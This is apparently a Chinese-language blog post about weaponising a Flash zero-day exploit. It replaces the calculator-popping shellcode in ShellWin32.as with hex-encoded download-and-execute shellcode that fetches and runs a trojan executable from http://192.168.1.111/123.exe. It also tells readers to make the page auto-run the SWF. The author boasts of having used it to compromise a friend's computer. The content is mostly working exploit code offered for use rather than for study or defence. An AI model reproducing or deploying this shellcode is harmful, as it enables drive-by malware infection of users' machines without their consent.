flash oday利用

admin

思路：
msf生成shellcode（exec下载者的，利用win下某漏洞）
然后把源码弹出计算机那段换成自己的exe文件
shellcode执行之后会下载exe文件，然后就中马~
当时测试成功了，把某基友电脑玩爆了~

修改地址：ShellWin32.as
shellcode原来代码：

1. 0x83EC8B55, 0x5153ACC4, 0x058B6457, 0x00000030, 0x8B0C408B, 0x008B0C40, 0x588B008B, 0x03D88918,
   
2.                                 0x508B3C40, 0x8BDA0178, 0xDF01207A, 0x078BC931, 0x3881D801, 0x61657243, 0x78811C75, 0x4173730B,
   
3.                                 0x8B137500, 0xD8012442, 0x4804B70F, 0x011C528B, 0x821C03DA, 0xC78309EB, 0x4A3B4104, 0x8DCF7C18,
   
4.                                 0x8D50F045, 0x3157AC7D, 0x0011B9C0, 0xABF30000, 0x44AC45C7, 0x50000000, 0x50505050, 0x0009E850,
   
5.                                 0x61630000, 0x652E636C, 0x50006578, 0x595FD3FF, 0x03E0C15B, 0xC906C083, 0x909090C3

复制代码

是弹出计算器的意思，16进制，8位一组。

修改后：

1. 0x8B64C933,0x408B3041,0x14708B0C,0x8BAD96AD,0x538B1058,0x8BD3033C,0xD3037852,0x0320728B,
   
2.       0x41C933F3,0x81C303AD,0x74654738,0x81F47550,0x6F720478,0xEB754163,0x64087881,0x75657264,
   
3.       0x24728BE2,0x8B66F303,0x8B494E0C,0xF3031C72,0x038E148B,0x51C933D3,0x78652e68,0x646c6865,
   
4.       0x62687a68,0x686d7379,0x65646f63,0x6c656868,0x7773686c,0x52537366,0x72616851,0x4C684179,
   
5.       0x68726269,0x64616F4C,0xD2FF5354,0x590CC483,0xB9665150,0x68516C6C,0x642E6E6F,0x6C727568,
   
6.       0xD0FF546D,0x8B10C483,0x33042454,0xB96651C9,0x33514165,0x466F68C9,0x6F686C69,0x68546461,
   
7.       0x6C6E776F,0x4C525568,0xFF505444,0x8DC933D2,0x51242454,0x47EB5251,0x83D0FF51,0xC9331CC4,
   
8.       0x52535B5A,0x65786851,0x4C886163,0x57680324,0x54456E69,0x6AD2FF53,0x244C8D05,0xD0FF5118,
   
9.       0x5A0CC483,0x7365685B,0x6C836173,0x68610324,0x636F7250,0x69784568,0xFF535474,0xE8D0FFD2,
   
10.       0xFFFFFFB4,
    
11.       //url http://192.168.1.111/123.exe\00
    
12.       0x70747468,0x312f2f3a,0x312e3239,0x302e3836,0x3730312e,0x3830383a,0x32312f31,0x78652e33,0x65,0x00
    
13. 
    
14.                         

复制代码

上面是exec下载，下面的是木马地址

然后编译一下，将直接的html那个submit改成直接执行swf，然后就看你的思路怎么淫荡了~~